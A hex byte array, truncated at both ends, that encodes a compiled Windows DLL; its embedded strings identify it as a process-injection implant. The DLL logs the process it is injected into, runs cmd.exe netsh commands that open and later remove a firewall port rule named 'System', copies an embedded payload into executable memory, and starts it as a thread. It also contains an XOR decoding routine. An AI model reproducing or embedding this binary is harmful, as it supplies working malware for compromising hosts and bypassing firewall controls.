0x76,0x05,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x04,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60, 0x2e,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0x11,0x07,0x00,0x00,0x00,0x20,0x00,0x00, 0x00,0x08,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2e,0x64,0x61,0x74,0x61,0x00,0x00,0x00, 0x2b,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x12,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xc0, 0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0xde,0x00,0x00,0x00,0x00,0x40,0x00,0x00, 0x00,0x02,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0xff,0x54,0x24,0x04,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x81,0xec,0x1c,0x01,0x00,0x00,0x56,0x57,0xc7,0x85,0xe8,0xfe,0xff, 
0xff,0x00,0x00,0x00,0x00,0xff,0x15,0x24,0x20,0x00,0x10,0x50,0xff,0x15,0x20,0x20, 0x00,0x10,0x50,0x68,0x8c,0x20,0x00,0x10,0x6a,0x16,0x68,0xb0,0x20,0x00,0x10,0xe8, 0x7c,0x03,0x00,0x00,0x83,0xc4,0x14,0x68,0x5c,0x11,0x00,0x00,0x68,0xc0,0x20,0x00, 0x10,0x6a,0x1a,0x68,0xf8,0x20,0x00,0x10,0xe8,0x63,0x03,0x00,0x00,0x83,0xc4,0x10, 0x68,0x5c,0x11,0x00,0x00,0x68,0x08,0x21,0x00,0x10,0x8d,0x85,0xf0,0xfe,0xff,0xff, 0x50,0xff,0x15,0x64,0x20,0x00,0x10,0x83,0xc4,0x0c,0x6a,0x00,0x8d,0x8d,0xf0,0xfe, 0xff,0xff,0x51,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b, 0x95,0xec,0xfe,0xff,0xff,0x52,0x68,0x40,0x21,0x00,0x10,0x6a,0x21,0x68,0x64,0x21, 0x00,0x10,0xe8,0x19,0x03,0x00,0x00,0x83,0xc4,0x10,0x6a,0x40,0x68,0x00,0x30,0x00, 0x00,0x68,0x2b,0x01,0x00,0x00,0x6a,0x00,0xff,0x15,0x18,0x20,0x00,0x10,0x89,0x45, 0xfc,0x83,0x7d,0xfc,0x00,0x0f,0x84,0xa1,0x00,0x00,0x00,0x8b,0x45,0xfc,0x50,0x68, 0x2b,0x01,0x00,0x00,0x68,0x74,0x21,0x00,0x10,0x6a,0x28,0x68,0xac,0x21,0x00,0x10, 0xe8,0xdb,0x02,0x00,0x00,0x83,0xc4,0x14,0xb9,0x4a,0x00,0x00,0x00,0xbe,0x00,0x30, 0x00,0x10,0x8b,0x7d,0xfc,0xf3,0xa5,0x66,0xa5,0xa4,0x6a,0x00,0x6a,0x00,0x8b,0x4d, 0xfc,0x51,0x68,0x00,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00, 0x10,0x89,0x85,0xe4,0xfe,0xff,0xff,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x00,0x74,0x1e, 0x6a,0xff,0x8b,0x95,0xe4,0xfe,0xff,0xff,0x52,0xff,0x15,0x10,0x20,0x00,0x10,0x8b, 0x85,0xe4,0xfe,0xff,0xff,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15, 0x08,0x20,0x00,0x10,0x50,0x68,0xbc,0x21,0x00,0x10,0x6a,0x38,0x68,0xd8,0x21,0x00, 0x10,0xe8,0x6a,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x00,0x80,0x00,0x00,0x6a,0x00, 0x8b,0x4d,0xfc,0x51,0xff,0x15,0x30,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15,0x08,0x20, 0x00,0x10,0x50,0x68,0xe8,0x21,0x00,0x10,0x6a,0x3f,0x68,0x04,0x22,0x00,0x10,0xe8, 0x3c,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x14,0x22,0x00,0x10,0x6a,0x43,0x68,0x40, 0x22,0x00,0x10,0xe8,0x28,0x02,0x00,0x00,0x83,0xc4,0x0c,0x6a,0x00,0x68,0x50,0x22, 
0x00,0x10,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b,0x95, 0xec,0xfe,0xff,0xff,0x52,0x68,0x90,0x22,0x00,0x10,0x6a,0x45,0x68,0xb4,0x22,0x00, 0x10,0xe8,0xfa,0x01,0x00,0x00,0x83,0xc4,0x10,0x68,0xc4,0x22,0x00,0x10,0x6a,0x47, 0x68,0xd8,0x22,0x00,0x10,0xe8,0xe6,0x01,0x00,0x00,0x83,0xc4,0x0c,0xff,0xb5,0xe8, 0xfe,0xff,0xff,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,0xff,0x75,0x08,0xff,0x35,0x5c, 0x20,0x00,0x10,0xa1,0x30,0x20,0x00,0x10,0xff,0xe0,0x8b,0x85,0xe8,0xfe,0xff,0xff, 0x5f,0x5e,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x56,0x8b,0x74,0x24,0x08,0x57,0x8b,0x7c,0x24,0x14,0x33,0xc0,0x85,0xff,0x76,0x08, 0x88,0x04,0x30,0x40,0x3b,0xc7,0x72,0xf8,0x33,0xc0,0x85,0xff,0x76,0x13,0x8a,0x4c, 0x24,0x10,0x8a,0x14,0x30,0x32,0xd0,0x02,0xd1,0x88,0x14,0x30,0x40,0x3b,0xc7,0x72, 0xf1,0x5f,0x5e,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x8b,0x44,0x24,0x08,0x81,0xec,0x10,0x02,0x00,0x00,0x83,0xe8,0x01,0x0f,0x85,0xe4, 0x00,0x00,0x00,0x56,0x57,0x68,0x04,0x01,0x00,0x00,0x8d,0x84,0x24,0x18,0x01,0x00, 0x00,0x50,0x6a,0x00,0xc7,0x44,0x24,0x18,0x04,0x01,0x00,0x00,0xff,0x15,0x58,0x20, 0x00,0x10,0x50,0xff,0x15,0x2c,0x20,0x00,0x10,0x8d,0x4c,0x24,0x0c,0x51,0x8d,0x54, 0x24,0x14,0x52,0xff,0x15,0x00,0x20,0x00,0x10,0x8d,0x44,0x24,0x10,0x50,0xff,0x15, 0x20,0x20,0x00,0x10,0x50,0x8d,0x8c,0x24,0x1c,0x01,0x00,0x00,0x51,0x68,0xe8,0x22, 0x00,0x10,0x6a,0x7e,0x68,0x28,0x23,0x00,0x10,0xe8,0x02,0x01,0x00,0x00,0x8b,0xbc, 0x24,0x34,0x02,0x00,0x00,0x8b,0x77,0x3c,0x83,0xc4,0x18,0x8d,0x54,0x24,0x08,0x52, 0x03,0xf7,0xc7,0x44,0x24,0x0c,0x00,0x00,0x00,0x00,0x8b,0x46,0x54,0x6a,0x04,0x50, 0x57,0xff,0x15,0x28,0x20,0x00,0x10,0x85,0xc0,0x74,0x0f,0x8b,0x4e,0x54,0x51,0x6a, 0x00,0x57,0xe8,0x19,0xff,0xff,0xff,0x83,0xc4,0x0c,0x6a,0x00,0x6a,0x00,0x57,0x68, 0x10,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00,0x10,0x5f,0x5e, 0x85,0xc0,0x74,0x15,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xb8,0x01,0x00,0x00,0x00, 
0x81,0xc4,0x10,0x02,0x00,0x00,0xc2,0x0c,0x00,0xff,0x15,0x08,0x20,0x00,0x10,0x50, 0x68,0x38,0x23,0x00,0x10,0x68,0x94,0x00,0x00,0x00,0x68,0x54,0x23,0x00,0x10,0xe8, 0x7c,0x00,0x00,0x00,0x83,0xc4,0x10,0xb8,0x01,0x00,0x00,0x00,0x81,0xc4,0x10,0x02, 0x00,0x00,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x6a,0x40,0x68,0x64,0x23,0x00,0x10,0x68,0x6c,0x23,0x00,0x10,0x6a,0x00,0xff,0x15, 0x68,0x20,0x00,0x10,0x6a,0x00,0xff,0x15,0x34,0x20,0x00,0x10,0xcc,0xcc,0xcc,0xcc, 0x53,0x8b,0x1d,0x38,0x20,0x00,0x10,0x55,0x56,0x57,0x8b,0x7c,0x24,0x14,0x57,0x8b, 0xef,0x33,0xf6,0xff,0xd3,0x85,0xc0,0x7e,0x1e,0x8d,0xa4,0x24,0x00,0x00,0x00,0x00, 0x8a,0x04,0x3e,0x3c,0x5c,0x74,0x04,0x3c,0x2f,0x75,0x04,0x8d,0x6c,0x3e,0x01,0x57, 0x46,0xff,0xd3,0x3b,0xf0,0x7c,0xe9,0x5f,0x5e,0x8b,0xc5,0x5d,0x5b,0xc3,0xcc,0xcc, 0x51,0x56,0x8b,0x35,0x54,0x20,0x00,0x10,0x57,0x68,0x7c,0x23,0x00,0x10,0x68,0x84, 0x23,0x00,0x10,0xff,0xd6,0x8b,0x3d,0x50,0x20,0x00,0x10,0x50,0xff,0xd7,0x89,0x44, 0x24,0x08,0x85,0xc0,0x0f,0x84,0xf1,0x00,0x00,0x00,0x55,0x68,0x90,0x23,0x00,0x10, 0x68,0x9c,0x23,0x00,0x10,0xff,0xd6,0x50,0xff,0xd7,0x8b,0xe8,0x85,0xed,0x0f,0x84, 0xd6,0x00,0x00,0x00,0x68,0xa8,0x23,0x00,0x10,0x68,0xb4,0x23,0x00,0x10,0xff,0xd6, 0x50,0xff,0xd7,0x85,0xc0,0x0f,0x84,0xbf,0x00,0x00,0x00,0x8b,0x54,0x24,0x1c,0x53, 0x8d,0x4c,0x24,0x24,0x51,0x52,0xff,0xd0,0x8b,0x1d,0x4c,0x20,0x00,0x10,0x8b,0xf8, 0x83,0xc4,0x08,0x81,0xc7,0x00,0x01,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf0, 0x85,0xf6,0x0f,0x84,0x91,0x00,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf8,0x85, 0xff,0x75,0x0d,0x56,0xff,0x15,0x48,0x20,0x00,0x10,0x5b,0x5d,0x5f,0x5e,0x59,0xc3, 0x8b,0x4c,0x24,0x20,0x8d,0x44,0x24,0x24,0x50,0x51,0x56,0xff,0xd5,0x8b,0x54,0x24, 0x28,0x8b,0x44,0x24,0x24,0x83,0xc4,0x0c,0x56,0x52,0x50,0xe8,0x00,0xff,0xff,0xff, 0x83,0xc4,0x04,0x50,0xff,0x15,0x20,0x20,0x00,0x10,0x50,0x68,0xc0,0x23,0x00,0x10, 0x57,0xff,0x54,0x24,0x28,0x83,0xc4,0x18,0x57,0xff,0x15,0x44,0x20,0x00,0x10,0x6a, 
0xf5,0xff,0x15,0x40,0x20,0x00,0x10,0x8b,0xd8,0x83,0xfb,0xff,0x74,0x1f,0x6a,0x00, 0x8d,0x4c,0x24,0x14,0x51,0x56,0xc7,0x44,0x24,0x1c,0x00,0x00,0x00,0x00,0xff,0x15, 0x38,0x20,0x00,0x10,0x50,0x56,0x53,0xff,0x15,0x3c,0x20,0x00,0x10,0x57,0x8b,0x3d, 0x48,0x20,0x00,0x10,0xff,0xd7,0x56,0xff,0xd7,0x5b,0x5d,0x5f,0x5e,0x59,0xc3,0xcc, 0xff,0x25,0x5c,0x20,0x00,0x10,0xff,0x25,0x30,0x20,0x00,0x10,0xff,0x25,0x08,0x20, 0x00,0x10,0xff,0x25,0x0c,0x20,0x00,0x10,0xff,0x25,0x10,0x20,0x00,0x10,0xff,0x25, 0x14,0x20,0x00,0x10,0xff,0x25,0x18,0x20,0x00,0x10,0xff,0x25,0x1c,0x20,0x00,0x10, 0xff,0x25,0x20,0x20,0x00,0x10,0xff,0x25,0x24,0x20,0x00,0x10,0xff,0x25,0x28,0x20, 0x00,0x10,0xff,0x25,0x2c,0x20,0x00,0x10,0xff,0x25,0x58,0x20,0x00,0x10,0xff,0x25, 0x34,0x20,0x00,0x10,0xff,0x25,0x38,0x20,0x00,0x10,0xff,0x25,0x3c,0x20,0x00,0x10, 0xff,0x25,0x40,0x20,0x00,0x10,0xff,0x25,0x44,0x20,0x00,0x10,0xff,0x25,0x48,0x20, 0x00,0x10,0xff,0x25,0x4c,0x20,0x00,0x10,0xff,0x25,0x50,0x20,0x00,0x10,0xff,0x25, 0x54,0x20,0x00,0x10,0xff,0x25,0x64,0x20,0x00,0x10,0xff,0x25,0x68,0x20,0x00,0x10, 0xff,0x25,0x00,0x20,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00, 0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00,0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00, 
0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00,0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00, 0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00,0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00, 0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00,0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00, 0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00,0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00, 0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00,0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00, 0x61,0x00,0x00,0x00,0xb0,0x26,0x00,0x00,0xb0,0x10,0x00,0x00,0x4d,0x61,0x69,0x6e, 0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x54,0x68,0x72,0x65,0x61,0x64, 0x20,0x25,0x78,0x3a,0x25,0x78,0x20,0x73,0x74,0x61,0x72,0x74,0x65,0x64,0x0a,0x00, 0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00, 0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x41,0x64, 0x64,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x72,0x75, 0x6c,0x65,0x20,0x66,0x6f,0x72,0x20,0x54,0x43,0x50,0x20,0x70,0x6f,0x72,0x74,0x20, 0x25,0x64,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20, 0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c, 0x6c,0x20,0x61,0x64,0x64,0x20,0x70,0x6f,0x72,0x74,0x6f,0x70,0x65,0x6e,0x69,0x6e, 0x67,0x20,0x54,0x43,0x50,0x20,0x25,0x64,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x00, 0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f, 0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25, 0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29, 0x3a,0x20,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,0x25,0x64,0x20,0x62, 0x79,0x74,0x65,0x73,0x20,0x66,0x6f,0x72,0x20,0x70,0x61,0x79,0x6c,0x6f,0x61,0x64, 
0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x78,0x0a,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c, 0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61, 0x74,0x65,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52, 0x20,0x25,0x64,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x41, 0x6c,0x6c,0x6f,0x63,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a, 0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29, 0x3a,0x20,0x44,0x65,0x6c,0x65,0x74,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77, 0x61,0x6c,0x6c,0x20,0x72,0x75,0x6c,0x65,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x00,0x00, 0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00, 0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20,0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68, 0x20,0x61,0x64,0x76,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x66,0x69,0x72, 0x65,0x77,0x61,0x6c,0x6c,0x20,0x64,0x65,0x6c,0x65,0x74,0x65,0x20,0x72,0x75,0x6c, 0x65,0x20,0x6e,0x61,0x6d,0x65,0x3d,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,0x00,0x00, 0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f, 0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25, 0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29, 0x3a,0x20,0x45,0x58,0x49,0x54,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x44,0x6c,0x6c,0x4d,0x61,0x69,0x6e,0x28, 0x29,0x3a,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x65,0x64,0x20,0x69,0x6e,0x74,0x6f, 0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x22,0x25,0x73,0x22,0x20,0x28,0x50, 0x49,0x44,0x3d,0x25,0x64,0x29,0x2c,0x20,0x55,0x73,0x65,0x72,0x20,0x3d,0x20,0x22, 
0x25,0x73,0x22,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69, 0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x54,0x68, 0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a, 0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70, 0x70,0x00,0x00,0x00,0x44,0x75,0x6d,0x6d,0x79,0x28,0x29,0x00,0x3c,0x4f,0x4b,0x3e, 0x20,0x74,0x6f,0x20,0x65,0x78,0x69,0x74,0x2e,0x2e,0x2e,0x00,0x73,0x70,0x72,0x69, 0x6e,0x74,0x66,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00, 0x76,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x00,0x00,0x00,0x00,0x6d,0x73,0x76,0x63, 0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5f,0x76,0x73,0x63,0x70,0x72,0x69,0x6e, 0x74,0x66,0x00,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00, 0x5b,0x25,0x2e,0x35,0x64,0x5d,0x20,0x2e,0x5c,0x25,0x73,0x28,0x25,0x64,0x29,0x20, 0x3a,0x20,0x25,0x73,0x00,0x00,0x00,0x00,0x30,0x24,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x02,0x26,0x00,0x00,0x08,0x20,0x00,0x00,0x8c,0x24,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2a,0x26,0x00,0x00,0x64,0x20,0x00,0x00, 0x28,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x26,0x00,0x00, 0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00, 0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00,0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00, 0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00,0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00, 0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00,0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00, 0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00,0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00, 0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00,0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00, 0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00, 0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x01,0x45,0x78,0x69,0x74,0x54,0x68, 
0x72,0x65,0x61,0x64,0x00,0x00,0x57,0x04,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x46, 0x72,0x65,0x65,0x00,0xe6,0x01,0x47,0x65,0x74,0x4c,0x61,0x73,0x74,0x45,0x72,0x72, 0x6f,0x72,0x00,0x00,0x43,0x00,0x43,0x6c,0x6f,0x73,0x65,0x48,0x61,0x6e,0x64,0x6c, 0x65,0x00,0x64,0x04,0x57,0x61,0x69,0x74,0x46,0x6f,0x72,0x53,0x69,0x6e,0x67,0x6c, 0x65,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0xa3,0x00,0x43,0x72,0x65,0x61,0x74,0x65, 0x54,0x68,0x72,0x65,0x61,0x64,0x00,0x00,0x54,0x04,0x56,0x69,0x72,0x74,0x75,0x61, 0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00,0x7b,0x04,0x57,0x69,0x6e,0x45,0x78,0x65, 0x63,0x00,0xaa,0x01,0x47,0x65,0x74,0x43,0x75,0x72,0x72,0x65,0x6e,0x74,0x50,0x72, 0x6f,0x63,0x65,0x73,0x73,0x49,0x64,0x00,0xad,0x01,0x47,0x65,0x74,0x43,0x75,0x72, 0x72,0x65,0x6e,0x74,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x64,0x00,0x00,0x5a,0x04, 0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x50,0x72,0x6f,0x74,0x65,0x63,0x74,0x00,0x00, 0xf4,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x46,0x69,0x6c,0x65,0x4e, 0x61,0x6d,0x65,0x41,0x00,0x00,0xf6,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c, 0x65,0x48,0x61,0x6e,0x64,0x6c,0x65,0x41,0x00,0x00,0x04,0x01,0x45,0x78,0x69,0x74, 